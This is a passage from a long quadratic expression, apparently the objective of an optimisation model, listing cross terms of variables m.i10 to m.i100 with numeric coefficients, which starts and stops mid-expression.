0.00390108*m.i10*m.i11 + 0.00306506*m.i10*m.i12 + 0.0266658*m.i10*m.i13 + 0.027667*m.i10*m.i14 +
0.01278752*m.i10*m.i15 + 0.01031474*m.i10*m.i16 + 0.01126594*m.i10*m.i17 + 0.00489102*m.i10*m.i18
+ 0.00513038*m.i10*m.i19 + 0.01899656*m.i10*m.i20 + 0.01116072*m.i10*m.i21 + 0.0218888*m.i10*
m.i22 + 0.01101148*m.i10*m.i23 + 0.00938786*m.i10*m.i24 + 0.00495956*m.i10*m.i25 + 0.00409492*
m.i10*m.i26 + 0.00774196*m.i10*m.i27 + 0.00563678*m.i10*m.i28 + 0.00452506*m.i10*m.i29 +
0.0234496*m.i10*m.i30 + 0.00879878*m.i10*m.i31 + 0.01816086*m.i10*m.i32 + 0.01204676*m.i10*m.i33
+ 0.00474448*m.i10*m.i34 + 0.00478426*m.i10*m.i35 + 0.0297012*m.i10*m.i36 + 0.0151832*m.i10*
m.i37 + 0.00256504*m.i10*m.i38 + 0.01482468*m.i10*m.i39 + 0.0351312*m.i10*m.i40 + 0.00722204*
m.i10*m.i41 + 0.00911442*m.i10*m.i42 + 0.00459148*m.i10*m.i43 + 0.00643892*m.i10*m.i44 +
0.00232242*m.i10*m.i45 + 0.00525016*m.i10*m.i46 + 0.00918898*m.i10*m.i47 + 0.00604914*m.i10*m.i48
+ 0.00855226*m.i10*m.i49 + 0.01758968*m.i10*m.i50 + 0.00905476*m.i10*m.i51 + 0.0076611*m.i10*
m.i52 + 0.01159398*m.i10*m.i53 + 0.00933998*m.i10*m.i54 + 0.00932956*m.i10*m.i55 + 0.0077777*
m.i10*m.i56 + 0.00585234*m.i10*m.i57 + 0.00494612*m.i10*m.i58 + 0.01267098*m.i10*m.i59 +
0.0025072*m.i10*m.i60 + 0.01652258*m.i10*m.i61 + 0.0113132*m.i10*m.i62 + 0.00647572*m.i10*m.i63
+ 0.00509638*m.i10*m.i64 + 0.00796924*m.i10*m.i65 + 0.00671784*m.i10*m.i66 + 0.00876736*m.i10*
m.i67 + 0.00330284*m.i10*m.i68 + 0.0143256*m.i10*m.i69 + 0.00658518*m.i10*m.i70 + 0.00751304*
m.i10*m.i71 + 0.00447272*m.i10*m.i72 + 0.00707326*m.i10*m.i73 + 0.01022514*m.i10*m.i74 +
0.00629098*m.i10*m.i75 + 0.00437386*m.i10*m.i76 + 0.0069722*m.i10*m.i77 + 0.00631338*m.i10*m.i78
+ 0.01475202*m.i10*m.i79 + 0.00722624*m.i10*m.i80 + 0.00973154*m.i10*m.i81 + 0.00371556*m.i10*
m.i82 + 0.00253096*m.i10*m.i83 + 0.008833*m.i10*m.i84 + 0.00871744*m.i10*m.i85 + 0.0101816*m.i10*
m.i86 + 0.01000738*m.i10*m.i87 + 0.01974334*m.i10*m.i88 + 0.00587674*m.i10*m.i89 + 0.0124516*
m.i10*m.i90 + 0.00915752*m.i10*m.i91 + 0.00913708*m.i10*m.i92 + 0.00200378*m.i10*m.i93 +
0.00536928*m.i10*m.i94 + 0.00823672*m.i10*m.i95 + 0.01736144*m.i10*m.i96 + 0.01105742*m.i10*m.i97
+ 0.01023842*m.i10*m.i98 + 0.01685104*m.i10*m.i99 + 0.01457986*m.i10*m.i100 + 0.000833086*m.i11*
m.i12 + 0.00999478*m.i11*m.i13 + 0.01344484*m.i11*m.i14 + 0.0031808*m.i11*m.i15 + 0.01117228*
m.i11*m.i16 + 0.000697152*m.i11*m.i17 + 0.000585828*m.i11*m.i18 + 0.00585952*m.i11*m.i19 +
0.00859976*m.i11*m.i20 + 0.00502902*m.i11*m.i21 + 0.00447154*m.i11*m.i22 + 0.001969568*m.i11*
m.i23 + 0.0049358*m.i11*m.i24 - 0.00029705*m.i11*m.i25 + 0.0008833*m.i11*m.i26 + 0.00788936*m.i11
*m.i27 + 0.00223564*m.i11*m.i28 - 0.001370818*m.i11*m.i29 + 0.0148367*m.i11*m.i30 + 0.01084338*
m.i11*m.i31 + 0.000606756*m.i11*m.i32 + 0.00591896*m.i11*m.i33 - 0.00408456*m.i11*m.i34 -
0.002724*m.i11*m.i35 + 0.01495302*m.i11*m.i36 + 0.0001528802*m.i11*m.i37 + 0.000200858*m.i11*
m.i38 + 0.00843216*m.i11*m.i39 + 0.01341476*m.i11*m.i40 + 0.01160686*m.i11*m.i41 + 0.00464728*
m.i11*m.i42 + 0.00803576*m.i11*m.i43 + 0.00270742*m.i11*m.i44 - 0.00352162*m.i11*m.i45 +
0.000947796*m.i11*m.i46 + 0.00388898*m.i11*m.i47 + 0.00557236*m.i11*m.i48 + 0.00208008*m.i11*
m.i49 + 0.000931698*m.i11*m.i50 + 0.000654446*m.i11*m.i51 + 0.00650504*m.i11*m.i52 + 0.000501194*
m.i11*m.i53 + 0.00681518*m.i11*m.i54 + 0.00601122*m.i11*m.i55 - 0.00507122*m.i11*m.i56 +
0.000483176*m.i11*m.i57 + 0.00482018*m.i11*m.i58 + 0.0064067*m.i11*m.i59 - 0.000166498*m.i11*
m.i60 + 0.00575774*m.i11*m.i61 + 0.00725456*m.i11*m.i62 + 0.00219412*m.i11*m.i63 + 0.0084673*
m.i11*m.i64 + 0.000333436*m.i11*m.i65 + 0.00655332*m.i11*m.i66 - 0.00257168*m.i11*m.i67 +
0.01199786*m.i11*m.i68 + 0.0059299*m.i11*m.i69 + 0.001843394*m.i11*m.i70 + 0.01060724*m.i11*m.i71
+ 0.00647206*m.i11*m.i72 + 0.00231676*m.i11*m.i73 + 0.00580344*m.i11*m.i74 + 0.00620538*m.i11*
m.i75 - 0.000334258*m.i11*m.i76 + 0.00656424*m.i11*m.i77 - 0.001286316*m.i11*m.i78 + 0.00546106*
m.i11*m.i79 - 0.000202642*m.i11*m.i80 + 0.00426114*m.i11*m.i81 - 0.00204892*m.i11*m.i82 +
0.01117602*m.i11*m.i83 + 0.01034244*m.i11*m.i84 + 0.00449542*m.i11*m.i85 + 0.00797378*m.i11*m.i86
- 0.000792844*m.i11*m.i87 + 0.01939124*m.i11*m.i88 + 0.00432784*m.i11*m.i89 + 0.00204578*m.i11*
m.i90 + 0.021152*m.i11*m.i91 + 0.00283286*m.i11*m.i92 - 0.00407532*m.i11*m.i93 - 0.001198622*
m.i11*m.i94 + 0.0056114*m.i11*m.i95 + 0.00560696*m.i11*m.i96 + 0.00867776*m.i11*m.i97 +
0.01208222*m.i11*m.i98 + 0.00209588*m.i11*m.i99 + 0.0061276*m.i11*m.i100 + 0.00580036*m.i12*m.i13
+ 0.01674486*m.i12*m.i14 + 0.00758412*m.i12*m.i15 + 0.0061097*m.i12*m.i16 + 0.00406024*m.i12*
m.i17 + 0.00246134*m.i12*m.i18 + 0.00422294*m.i12*m.i19 + 0.00359302*m.i12*m.i20 + 0.0027503*
m.i12*m.i21 + 0.01042736*m.i12*m.i22 + 0.001094158*m.i12*m.i23 + 0.00410122*m.i12*m.i24 +
0.0025257*m.i12*m.i25 + 0.00319626*m.i12*m.i26 + 0.00241386*m.i12*m.i27 + 0.001365712*m.i12*m.i28
+ 0.00285332*m.i12*m.i29 + 0.01617908*m.i12*m.i30 + 0.00231724*m.i12*m.i31 + 0.00343892*m.i12*
m.i32 + 0.00256516*m.i12*m.i33 + 0.001014308*m.i12*m.i34 + 0.001643396*m.i12*m.i35 + 0.00879946*
m.i12*m.i36 + 0.00422942*m.i12*m.i37 + 0.001108756*m.i12*m.i38 + 0.0068803*m.i12*m.i39 -
0.00375268*m.i12*m.i40 + 0.0029422*m.i12*m.i41 + 0.00429146*m.i12*m.i42 + 0.00277958*m.i12*m.i43
+ 0.00284814*m.i12*m.i44 + 0.001633544*m.i12*m.i45 + 0.00422296*m.i12*m.i46 + 0.000606884*m.i12*
m.i47 + 0.0041981*m.i12*m.i48 + 0.00378962*m.i12*m.i49 + 0.00842602*m.i12*m.i50 + 0.002132*m.i12*
m.i51 + 0.00482062*m.i12*m.i52 + 0.00806126*m.i12*m.i53 + 0.00387284*m.i12*m.i54 + 0.0039366*
m.i12*m.i55 + 0.000612768*m.i12*m.i56 + 0.0044852*m.i12*m.i57 + 0.00284844*m.i12*m.i58 +
0.00336708*m.i12*m.i59 + 0.0030099*m.i12*m.i60 + 0.00693418*m.i12*m.i61 + 0.0046908*m.i12*m.i62
+ 0.00538386*m.i12*m.i63 + 0.00560854*m.i12*m.i64 + 0.00360994*m.i12*m.i65 + 0.00317544*m.i12*
m.i66 + 0.00443286*m.i12*m.i67 + 0.00420074*m.i12*m.i68 + 0.00506986*m.i12*m.i69 + 0.00415464*
m.i12*m.i70 + 0.00220046*m.i12*m.i71 + 0.00230386*m.i12*m.i72 + 0.00311708*m.i12*m.i73 +
0.00731294*m.i12*m.i74 + 0.0048156*m.i12*m.i75 + 0.00332812*m.i12*m.i76 + 0.00439802*m.i12*m.i77
+ 0.00371872*m.i12*m.i78 + 0.00601328*m.i12*m.i79 + 0.00749754*m.i12*m.i80 + 0.00280082*m.i12*
m.i81 + 0.00202854*m.i12*m.i82 + 0.001389608*m.i12*m.i83 + 0.00387764*m.i12*m.i84 + 0.00354982*
m.i12*m.i85 + 0.00265444*m.i12*m.i86 + 0.0022211*m.i12*m.i87 + 0.00666916*m.i12*m.i88 +
0.00412408*m.i12*m.i89 + 0.00421336*m.i12*m.i90 + 0.00306034*m.i12*m.i91 + 0.00210254*m.i12*m.i92
+ 0.001819242*m.i12*m.i93 + 0.0007903*m.i12*m.i94 + 0.00409078*m.i12*m.i95 + 0.00988156*m.i12*
m.i96 + 0.00522182*m.i12*m.i97 + 0.00482098*m.i12*m.i98 + 0.0042136*m.i12*m.i99 + 0.00408986*
m.i12*m.i100 + 0.0674968*m.i13*m.i14 + 0.0344974*m.i13*m.i15 + 0.0330226*m.i13*m.i16 + 0.0319354*
m.i13*m.i17 + 0.01218366*m.i13*m.i18 + 0.00519196*m.i13*m.i19 + 0.044536*m.i13*m.i20 + 0.0277772*
m.i13*m.i21 + 0.0622606*m.i13*m.i22 + 0.0259408*m.i13*m.i23 + 0.0302608*m.i13*m.i24 + 0.0163455*
m.i13*m.i25 + 0.0077583*m.i13*m.i26 + 0.0227636*m.i13*m.i27 + 0.01173702*m.i13*m.i28 + 0.00769116
*m.i13*m.i29 + 0.0709126*m.i13*m.i30 + 0.01974624*m.i13*m.i31 + 0.0471936*m.i13*m.i32 + 0.0320402
*m.i13*m.i33 + 0.0107856*m.i13*m.i34 + 0.00663924*m.i13*m.i35 + 0.0963608*m.i13*m.i36 + 0.0383208
*m.i13*m.i37 + 0.00629602*m.i13*m.i38 + 0.0436584*m.i13*m.i39 + 0.113305*m.i13*m.i40 + 0.030603*
m.i13*m.i41 + 0.0334486*m.i13*m.i42 + 0.0221094*m.i13*m.i43 + 0.0261022*m.i13*m.i44 + 0.00384036*
m.i13*m.i45 + 0.01393368*m.i13*m.i46 + 0.0390862*m.i13*m.i47 + 0.01408516*m.i13*m.i48 + 0.0200136
*m.i13*m.i49 + 0.0473844*m.i13*m.i50 + 0.0233922*m.i13*m.i51 + 0.0267544*m.i13*m.i52 + 0.0382128*
m.i13*m.i53 + 0.026998*m.i13*m.i54 + 0.0232812*m.i13*m.i55 + 0.0210468*m.i13*m.i56 + 0.01155576*
m.i13*m.i57 + 0.01460704*m.i13*m.i58 + 0.0315638*m.i13*m.i59 + 0.00606798*m.i13*m.i60 + 0.048913*
m.i13*m.i61 + 0.0422528*m.i13*m.i62 + 0.0227364*m.i13*m.i63 + 0.0218176*m.i13*m.i64 + 0.020181*
m.i13*m.i65 + 0.0171918*m.i13*m.i66 + 0.0231896*m.i13*m.i67 + 0.00653966*m.i13*m.i68 + 0.0386908*
m.i13*m.i69 + 0.01310368*m.i13*m.i70 + 0.0233574*m.i13*m.i71 + 0.01370986*m.i13*m.i72 +
0.01644046*m.i13*m.i73 + 0.0239108*m.i13*m.i74 + 0.01209114*m.i13*m.i75 + 0.00733894*m.i13*m.i76
+ 0.01831752*m.i13*m.i77 + 0.01361596*m.i13*m.i78 + 0.0349392*m.i13*m.i79 + 0.01738086*m.i13*
m.i80 + 0.0327952*m.i13*m.i81 + 0.00370036*m.i13*m.i82 + 0.0275306*m.i13*m.i83 + 0.0237408*m.i13*
m.i84 + 0.023854*m.i13*m.i85 + 0.0298082*m.i13*m.i86 + 0.01954408*m.i13*m.i87 + 0.0427146*m.i13*
m.i88 + 0.00800344*m.i13*m.i89 + 0.0379614*m.i13*m.i90 + 0.0237386*m.i13*m.i91 + 0.0280402*m.i13*
m.i92 + 0.00539152*m.i13*m.i93 + 0.00878456*m.i13*m.i94 + 0.0258544*m.i13*m.i95 + 0.0525716*m.i13
*m.i96 + 0.0324866*m.i13*m.i97 + 0.03178*m.i13*m.i98 + 0.0440898*m.i13*m.i99 + 0.0425102*m.i13*
m.i100 + 0.0526828*m.i14*m.i15 + 0.037439*m.i14*m.i16 + 0.0256328*m.i14*m.i17 + 0.0100326*m.i14*
m.i18 + 0.02287*m.i14*m.i19 + 0.05764*m.i14*m.i20 + 0.0305304*m.i14*m.i21 + 0.0790588*m.i14*m.i22
+ 0.0273134*m.i14*m.i23 + 0.0226144*m.i14*m.i24 + 0.01919436*m.i14*m.i25 + 0.01634394*m.i14*
m.i26 + 0.0200216*m.i14*m.i27 + 0.01187024*m.i14*m.i28 + 0.0175096*m.i14*m.i29 + 0.1303416*m.i14*
m.i30 + 0.01783484*m.i14*m.i31 + 0.0483706*m.i14*m.i32 + 0.0389666*m.i14*m.i33 + 0.00488422*m.i14
*m.i34 + 0.01045608*m.i14*m.i35 + 0.0811654*m.i14*m.i36 + 0.0367626*m.i14*m.i37 + 0.00522434*
m.i14*m.i38 + 0.05055*m.i14*m.i39 + 0.0849278*m.i14*m.i40 + 0.0341058*m.i14*m.i41 + 0.029549*
m.i14*m.i42 + 0.0119177*m.i14*m.i43 + 0.034956*m.i14*m.i44 + 0.0084943*m.i14*m.i45 + 0.01853266*
m.i14*m.i46 + 0.01893124*m.i14*m.i47 + 0.0205662*m.i14*m.i48 + 0.0326974*m.i14*m.i49 + 0.0610942*
m.i14*m.i50 + 0.0265816*m.i14*m.i51 + 0.0345152*m.i14*m.i52 + 0.0602904*m.i14*m.i53 + 0.0299894*
m.i14*m.i54 + 0.029724*m.i14*m.i55 + 0.00991024*m.i14*m.i56 + 0.0212834*m.i14*m.i57 + 0.01611994*
m.i14*m.i58 + 0.0349608*m.i14*m.i59 + 0.01544524*m.i14*m.i60 + 0.0660828*m.i14*m.i61 + 0.0517844*
m.i14*m.i62 + 0.0288716*m.i14*m.i63 + 0.02065*m.i14*m.i64 + 0.0285834*m.i14*m.i65 + 0.01348302*
m.i14*m.i66 + 0.0306592*m.i14*m.i67 + 0.01828946*m.i14*m.i68 + 0.0537368*m.i14*m.i69 + 0.0271944*
m.i14*m.i70 + 0.01793364*m.i14*m.i71 + 0.0206146*m.i14*m.i72 + 0.0281438*m.i14*m.i73 + 0.038653*
m.i14*m.i74 + 0.0322466*m.i14*m.i75 + 0.0212534*m.i14*m.i76 + 0.0336072*m.i14*m.i77 + 0.01910646*
m.i14*m.i78 + 0.0653414*m.i14*m.i79 + 0.0269972*m.i14*m.i80 + 0.0273492*m.i14*m.i81 + 0.01038358*
m.i14*m.i82 + 0.00619204*m.i14*m.i83 + 0.0273406*m.i14*m.i84 + 0.0211516*m.i14*m.i85 + 0.0382364*
m.i14*m.i86 + 0.0345294*m.i14*m.i87 + 0.1230516*m.i14*m.i88 + 0.032645*m.i14*m.i89 + 0.0494242*
m.i14*m.i90 + 0.030464*m.i14*m.i91 + 0.0229316*m.i14*m.i92 + 0.01328606*m.i14*m.i93 + 0.01219994*
m.i14*m.i94 + 0.0308436*m.i14*m.i95 + 0.0853596*m.i14*m.i96 + 0.0354032*m.i14*m.i97 + 0.0262134*
m.i14*m.i98 + 0.0473304*m.i14*m.i99 + 0.037143*m.i14*m.i100 + 0.01723066*m.i15*m.i16 + 0.0144032*
m.i15*m.i17 + 0.01011568*m.i15*m.i18 + 0.01071386*m.i15*m.i19 + 0.0363128*m.i15*m.i20 + 0.0200062
*m.i15*m.i21 + 0.0429276*m.i15*m.i22 + 0.01550086*m.i15*m.i23 + 0.01336936*m.i15*m.i24 +
0.01153424*m.i15*m.i25 + 0.01291552*m.i15*m.i26 + 0.01571376*m.i15*m.i27 + 0.0057752*m.i15*m.i28
+ 0.01132328*m.i15*m.i29 + 0.04615*m.i15*m.i30 + 0.0095472*m.i15*m.i31 + 0.0348208*m.i15*m.i32
+ 0.01999334*m.i15*m.i33 + 0.00687142*m.i15*m.i34 + 0.00887602*m.i15*m.i35 + 0.0412134*m.i15*
m.i36 + 0.0222294*m.i15*m.i37 + 0.0044452*m.i15*m.i38 + 0.0275012*m.i15*m.i39 + 0.0449902*m.i15*
m.i40 + 0.0316194*m.i15*m.i41 + 0.021335*m.i15*m.i42 + 0.01203424*m.i15*m.i43 + 0.0250958*m.i15*
m.i44 + 0.00747774*m.i15*m.i45 + 0.01208838*m.i15*m.i46 + 0.0258298*m.i15*m.i47 + 0.01217868*
m.i15*m.i48 + 0.0181139*m.i15*m.i49 + 0.0324096*m.i15*m.i50 + 0.01156602*m.i15*m.i51 + 0.01869794
*m.i15*m.i52 + 0.0276488*m.i15*m.i53 + 0.0230496*m.i15*m.i54 + 0.0171536*m.i15*m.i55 + 0.01527606
*m.i15*m.i56 + 0.01288824*m.i15*m.i57 + 0.014014*m.i15*m.i58 + 0.01657292*m.i15*m.i59 + 0.0080112
*m.i15*m.i60 + 0.0380938*m.i15*m.i61 + 0.0298954*m.i15*m.i62 + 0.0218266*m.i15*m.i63 + 0.01580514
*m.i15*m.i64 + 0.01327226*m.i15*m.i65 + 0.01171988*m.i15*m.i66 + 0.01749552*m.i15*m.i67 +
0.00958228*m.i15*m.i68 + 0.02991*m.i15*m.i69 + 0.01687722*m.i15*m.i70 + 0.0214718*m.i15*m.i71 +
0.0177952*m.i15*m.i72 + 0.01429134*m.i15*m.i73 + 0.01835742*m.i15*m.i74 + 0.014413*m.i15*m.i75 +
0.01215492*m.i15*m.i76 + 0.01888264*m.i15*m.i77 + 0.01135654*m.i15*m.i78 + 0.01419354*m.i15*m.i79
+ 0.01589948*m.i15*m.i80 + 0.01996746*m.i15*m.i81 + 0.00616376*m.i15*m.i82 + 0.00905236*m.i15*
m.i83 + 0.01329424*m.i15*m.i84 + 0.01265054*m.i15*m.i85 + 0.01743812*m.i15*m.i86 + 0.01662354*
m.i15*m.i87 + 0.0326642*m.i15*m.i88 + 0.00648876*m.i15*m.i89 + 0.0255582*m.i15*m.i90 + 0.01710528
*m.i15*m.i91 + 0.01530604*m.i15*m.i92 + 0.00729364*m.i15*m.i93 + 0.00786908*m.i15*m.i94 +
0.0169034*m.i15*m.i95 + 0.034265*m.i15*m.i96 + 0.0206426*m.i15*m.i97 + 0.01574576*m.i15*m.i98 +
0.0251768*m.i15*m.i99 + 0.0302234*m.i15*m.i100 + 0.0180502*m.i16*m.i17 + 0.00797572*m.i16*m.i18
+ 0.00993386*m.i16*m.i19 + 0.0236072*m.i16*m.i20 + 0.01425014*m.i16*m.i21 + 0.0269392*m.i16*
m.i22 + 0.01322908*m.i16*m.i23 + 0.01719786*m.i16*m.i24 + 0.00995474*m.i16*m.i25 + 0.00544834*
m.i16*m.i26 + 0.01319632*m.i16*m.i27 + 0.00695148*m.i16*m.i28 + 0.00568042*m.i16*m.i29 + 0.045082
*m.i16*m.i30 + 0.01190474*m.i16*m.i31 + 0.01955462*m.i16*m.i32 + 0.0138212*m.i16*m.i33 +
0.00642106*m.i16*m.i34 + 0.00665524*m.i16*m.i35 + 0.0380492*m.i16*m.i36 + 0.01602708*m.i16*m.i37
+ 0.00369958*m.i16*m.i38 + 0.0220792*m.i16*m.i39 + 0.0304262*m.i16*m.i40 + 0.01843444*m.i16*
m.i41 + 0.021247*m.i16*m.i42 + 0.01518988*m.i16*m.i43 + 0.01406774*m.i16*m.i44 + 0.0051723*m.i16*
m.i45 + 0.0080675*m.i16*m.i46 + 0.0176419*m.i16*m.i47 + 0.0090298*m.i16*m.i48 + 0.0126196*m.i16*
m.i49 + 0.025967*m.i16*m.i50 + 0.01140228*m.i16*m.i51 + 0.01900414*m.i16*m.i52 + 0.01781402*m.i16
*m.i53 + 0.0194748*m.i16*m.i54 + 0.01211848*m.i16*m.i55 + 0.01166912*m.i16*m.i56 + 0.00870972*
m.i16*m.i57 + 0.00719416*m.i16*m.i58 + 0.01574372*m.i16*m.i59 + 0.00725944*m.i16*m.i60 +
0.0294988*m.i16*m.i61 + 0.0260914*m.i16*m.i62 + 0.01974094*m.i16*m.i63 + 0.01434116*m.i16*m.i64
+ 0.00954816*m.i16*m.i65 + 0.0087947*m.i16*m.i66 + 0.01216302*m.i16*m.i67 + 0.01307338*m.i16*
m.i68 + 0.023669*m.i16*m.i69 + 0.01061826*m.i16*m.i70 + 0.01531198*m.i16*m.i71 + 0.01282252*m.i16
*m.i72 + 0.01136194*m.i16*m.i73 + 0.01289612*m.i16*m.i74 + 0.0111961*m.i16*m.i75 + 0.00467394*
m.i16*m.i76 + 0.0120207*m.i16*m.i77 + 0.00634502*m.i16*m.i78 + 0.0272842*m.i16*m.i79 + 0.01354848
*m.i16*m.i80 + 0.01491878*m.i16*m.i81 + 0.00372788*m.i16*m.i82 + 0.01347184*m.i16*m.i83 +
0.01367452*m.i16*m.i84 + 0.01430584*m.i16*m.i85 + 0.01662228*m.i16*m.i86 + 0.01019354*m.i16*m.i87
+ 0.031864*m.i16*m.i88 + 0.01389622*m.i16*m.i89 + 0.01404588*m.i16*m.i90 + 0.01898344*m.i16*
m.i91 + 0.01310136*m.i16*m.i92 + 0.00293122*m.i16*m.i93 + 0.00548746*m.i16*m.i94 + 0.01674526*
m.i16*m.i95 + 0.0263504*m.i16*m.i96 + 0.0187966*m.i16*m.i97 + 0.0198675*m.i16*m.i98 + 0.0160833*
m.i16*m.i99 + 0.01885334*m.i16*m.i100 + 0.00599666*m.i17*m.i18 + 0.0047675*m.i17*m.i19 +
0.0265872*m.i17*m.i20 + 0.01628802*m.i17*m.i21 + 0.01871884*m.i17*m.i22 + 0.01233104*m.i17*m.i23
+ 0.01365522*m.i17*m.i24 + 0.00989432*m.i17*m.i25 + 0.00330258*m.i17*m.i26 + 0.0116841*m.i17*
m.i27 + 0.0079471*m.i17*m.i28 + 0.0045994*m.i17*m.i29 + 0.0254766*m.i17*m.i30 + 0.01659406*m.i17*
m.i31 + 0.0220846*m.i17*m.i32 + 0.01861566*m.i17*m.i33 + 0.00948066*m.i17*m.i34 + 0.0090429*m.i17
*m.i35 + 0.0337978*m.i17*m.i36 + 0.01595384*m.i17*m.i37 + 0.00235078*m.i17*m.i38 + 0.0201494*
m.i17*m.i39 + 0.0342284*m.i17*m.i40 + 0.0277738*m.i17*m.i41 + 0.01731318*m.i17*m.i42 + 0.01753214
*m.i17*m.i43 + 0.01978996*m.i17*m.i44 + 0.00369934*m.i17*m.i45 + 0.00718436*m.i17*m.i46 +
0.01949342*m.i17*m.i47 + 0.00499956*m.i17*m.i48 + 0.01707236*m.i17*m.i49 + 0.0203004*m.i17*m.i50
+ 0.01279548*m.i17*m.i51 + 0.011643*m.i17*m.i52 + 0.01115602*m.i17*m.i53 + 0.01587576*m.i17*
m.i54 + 0.010193*m.i17*m.i55 + 0.0217498*m.i17*m.i56 + 0.0064957*m.i17*m.i57 + 0.00989022*m.i17*
m.i58 + 0.01554654*m.i17*m.i59 + 0.00382894*m.i17*m.i60 + 0.01868378*m.i17*m.i61 + 0.01822302*
m.i17*m.i62 + 0.0270002*m.i17*m.i63 + 0.01054316*m.i17*m.i64 + 0.01114578*m.i17*m.i65 + 0.010706*
m.i17*m.i66 + 0.01057722*m.i17*m.i67 + 0.00541042*m.i17*m.i68 + 0.022045*m.i17*m.i69 + 0.00933892
*m.i17*m.i70 + 0.0217256*m.i17*m.i71 + 0.010527*m.i17*m.i72 + 0.01245986*m.i17*m.i73 + 0.01462496
*m.i17*m.i74 + 0.00471612*m.i17*m.i75 + 0.00385082*m.i17*m.i76 + 0.0150046*m.i17*m.i77 +
0.00469912*m.i17*m.i78 + 0.01570408*m.i17*m.i79 + 0.01238884*m.i17*m.i80 + 0.0167981*m.i17*m.i81
+ 0.00275656*m.i17*m.i82 + 0.0264668*m.i17*m.i83 + 0.01754616*m.i17*m.i84 + 0.0104241*m.i17*
m.i85 + 0.0155118*m.i17*m.i86 + 0.00992204*m.i17*m.i87 + 0.0334656*m.i17*m.i88 + 0.0100102*m.i17*
m.i89 + 0.00830234*m.i17*m.i90 + 0.00830522*m.i17*m.i91 + 0.01347376*m.i17*m.i92 + 0.00371114*
m.i17*m.i93 + 0.00721878*m.i17*m.i94 + 0.01197232*m.i17*m.i95 + 0.01097582*m.i17*m.i96 +
0.0153446*m.i17*m.i97 + 0.01911512*m.i17*m.i98 + 0.0158341*m.i17*m.i99 + 0.01647016*m.i17*m.i100
+ 0.0038501*m.i18*m.i19 + 0.01438424*m.i18*m.i20 + 0.00575166*m.i18*m.i21 + 0.01286738*m.i18*
m.i22 + 0.0072269*m.i18*m.i23 + 0.00577628*m.i18*m.i24 + 0.00353166*m.i18*m.i25 + 0.00406754*
m.i18*m.i26 + 0.00586712*m.i18*m.i27 + 0.00246394*m.i18*m.i28 + 0.00208424*m.i18*m.i29 +
0.00868042*m.i18*m.i30 + 0.00488392*m.i18*m.i31 + 0.01139774*m.i18*m.i32 + 0.00652178*m.i18*m.i33
+ 0.00514824*m.i18*m.i34 + 0.00420068*m.i18*m.i35 + 0.01314078*m.i18*m.i36 + 0.00738678*m.i18*
m.i37 + 0.00212172*m.i18*m.i38 + 0.00767338*m.i18*m.i39 + 0.01491396*m.i18*m.i40 + 0.00689198*
m.i18*m.i41 + 0.00941516*m.i18*m.i42 + 0.00703674*m.i18*m.i43 + 0.00623926*m.i18*m.i44 +
0.0042213*m.i18*m.i45 + 0.00377366*m.i18*m.i46 + 0.01005392*m.i18*m.i47 + 0.00385304*m.i18*m.i48
+ 0.0061538*m.i18*m.i49 + 0.00828744*m.i18*m.i50 + 0.00452496*m.i18*m.i51 + 0.00647618*m.i18*
m.i52 + 0.00595912*m.i18*m.i53 + 0.00909974*m.i18*m.i54 + 0.00683082*m.i18*m.i55 + 0.00696058*
m.i18*m.i56 + 0.00489492*m.i18*m.i57 + 0.00399036*m.i18*m.i58 + 0.0071619*m.i18*m.i59 +
0.00282566*m.i18*m.i60 + 0.01253118*m.i18*m.i61 + 0.01017836*m.i18*m.i62 + 0.0054806*m.i18*m.i63
+ 0.00679494*m.i18*m.i64 + 0.00492774*m.i18*m.i65 + 0.00294036*m.i18*m.i66 + 0.00302154*m.i18*
m.i67 + 0.00492864*m.i18*m.i68 + 0.01002278*m.i18*m.i69 + 0.00498708*m.i18*m.i70 + 0.00467346*
m.i18*m.i71 + 0.00622154*m.i18*m.i72 + 0.0060522*m.i18*m.i73 + 0.00606086*m.i18*m.i74 +
0.00435108*m.i18*m.i75 + 0.00246578*m.i18*m.i76 + 0.00518572*m.i18*m.i77 + 0.00318624*m.i18*m.i78
+ 0.00460288*m.i18*m.i79 + 0.007017*m.i18*m.i80 + 0.00647242*m.i18*m.i81 + 0.00407958*m.i18*
m.i82 - 0.000888864*m.i18*m.i83 + 0.00537106*m.i18*m.i84 + 0.00634694*m.i18*m.i85 + 0.00514234*
m.i18*m.i86 + 0.00350408*m.i18*m.i87 - 0.00202898*m.i18*m.i88 + 0.001751682*m.i18*m.i89 +
0.0065019*m.i18*m.i90 + 0.007451*m.i18*m.i91 + 0.0035437*m.i18*m.i92 + 0.001995674*m.i18*m.i93 +
0.00436006*m.i18*m.i94 + 0.00715274*m.i18*m.i95 + 0.00776482*m.i18*m.i96 + 0.00710082*m.i18*m.i97
+ 0.00609606*m.i18*m.i98 + 0.00652362*m.i18*m.i99 + 0.01247386*m.i18*m.i100 + 0.01204848*m.i19*
m.i20 + 0.00628788*m.i19*m.i21 + 0.00938206*m.i19*m.i22 + 0.00540152*m.i19*m.i23 + 0.00366816*
m.i19*m.i24 + 0.00424804*m.i19*m.i25 + 0.00443146*m.i19*m.i26 + 0.00550836*m.i19*m.i27 +
0.00441186*m.i19*m.i28 + 0.00464964*m.i19*m.i29 + 0.0215394*m.i19*m.i30 + 0.00534434*m.i19*m.i31
+ 0.01089826*m.i19*m.i32 + 0.00384858*m.i19*m.i33 + 0.00271286*m.i19*m.i34 + 0.00459438*m.i19*
m.i35 + 0.00753494*m.i19*m.i36 + 0.00675858*m.i19*m.i37 + 0.00330138*m.i19*m.i38 + 0.01012594*
m.i19*m.i39 + 0.00097236*m.i19*m.i40 + 0.00697634*m.i19*m.i41 + 0.0055734*m.i19*m.i42 +
0.00439042*m.i19*m.i43 + 0.00466626*m.i19*m.i44 + 0.0056599*m.i19*m.i45 + 0.00343664*m.i19*m.i46
+ 0.00191227*m.i19*m.i47 + 0.00409474*m.i19*m.i48 + 0.00728426*m.i19*m.i49 + 0.0118005*m.i19*
m.i50 + 0.00439032*m.i19*m.i51 + 0.00819602*m.i19*m.i52 + 0.00683532*m.i19*m.i53 + 0.00927236*
m.i19*m.i54 + 0.00638082*m.i19*m.i55 + 0.0049778*m.i19*m.i56 + 0.0064092*m.i19*m.i57 + 0.00332368
*m.i19*m.i58 + 0.00797006*m.i19*m.i59 + 0.00515114*m.i19*m.i60 + 0.0140857*m.i19*m.i61 +
0.00824548*m.i19*m.i62 + 0.00645382*m.i19*m.i63 + 0.00492056*m.i19*m.i64 + 0.0040063*m.i19*m.i65
+ 0.00621702*m.i19*m.i66 + 0.00486474*m.i19*m.i67 + 0.01089728*m.i19*m.i68 + 0.01064856*m.i19*
